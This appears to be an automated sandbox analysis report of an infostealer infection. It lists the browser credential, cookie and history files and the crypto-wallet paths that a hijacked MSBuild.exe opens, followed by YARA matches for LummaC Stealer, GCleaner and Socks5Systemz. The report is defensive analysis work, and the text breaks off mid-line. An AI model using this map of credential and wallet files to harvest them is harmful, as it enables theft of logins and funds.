                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                            Tries to steal Crypto Currency Wallets
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOH
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOH
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMG
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMG
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZG
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZG
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\WHZAGPPPLA
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\WHZAGPPPLA
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWR
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWR
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMG
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMG
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\DUKNXICOZT
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\DUKNXICOZT

                            Remote Access Functionality

                            barindex
                            Yara detected GCleaner
                            Source: Yara matchFile source: 5.2.soft.exe.9e18000.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.soft.exe.9f2c000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.soft.exe.a122000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.soft.exe.9f00000.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.3.soft.exe.a122000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.soft.exe.9e44000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000005.00000003.1654814559.000000000A112000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.1724312184.0000000009F2C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.1723674731.0000000009E18000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.1722279329.0000000009C4D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.1724497364.000000000A122000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.1723674731.0000000009E44000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.1724312184.0000000009F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Yara detected LummaC Stealer
                            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4600, type: MEMORYSTR
                            Source: Yara matchFile source: 23.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000017.00000002.2274119949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Yara detected Socks5Systemz
                            Source: Yara matchFile source: 0000000D.00000002.2540207459.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.2537786569.0000000002AF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: ssdtoolbox.exe PID: 2236, type: MEMORYSTR
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_609660FA sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,13_2_609660FA
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6090C1D6 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,13_2_6090C1D6
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_60963143 sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave,13_2_60963143
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6096A2BD sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,13_2_6096A2BD
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6096923E sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,13_2_6096923E
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6096A38C sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,13_2_6096A38C
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6096748C 